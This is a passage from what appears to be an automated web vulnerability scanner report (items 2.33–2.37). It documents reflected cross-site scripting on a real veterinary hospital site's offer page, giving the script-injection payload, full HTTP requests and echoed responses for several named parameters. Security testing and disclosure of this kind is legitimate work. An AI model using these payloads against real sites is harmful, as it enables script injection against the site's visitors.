52fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kobmgoan4hgeoq1ek4db6fi2v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f
...[SNIP]...

2.33. http://www.vcahospitals.com/main/offer [optin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8827"><script>alert(1)</script>059c58f8099 was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.34. http://www.vcahospitals.com/main/offer [other parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d5e"><script>alert(1)</script>d09f3450d0b was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6n7l65heh918gmaumh17hnsri4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city
...[SNIP]...

2.35. http://www.vcahospitals.com/main/offer [petage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48342"><script>alert(1)</script>799b196a043 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=s9111l9njt4haqvhbc32et8al6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26da
...[SNIP]...

2.36. http://www.vcahospitals.com/main/offer [petname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9d9"><script>alert(1)</script>32ff1a8fde2 was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=tltmjp59dlja7q81sha6gm0bu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307
...[SNIP]...

2.37. http://www.vcahospitals.com/main/offer [pettype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ff0"><script>alert(1)</script>c819c2cd266 was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=21dh1lcji1465f3ng24l2mb1q3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26
...[SNIP]...

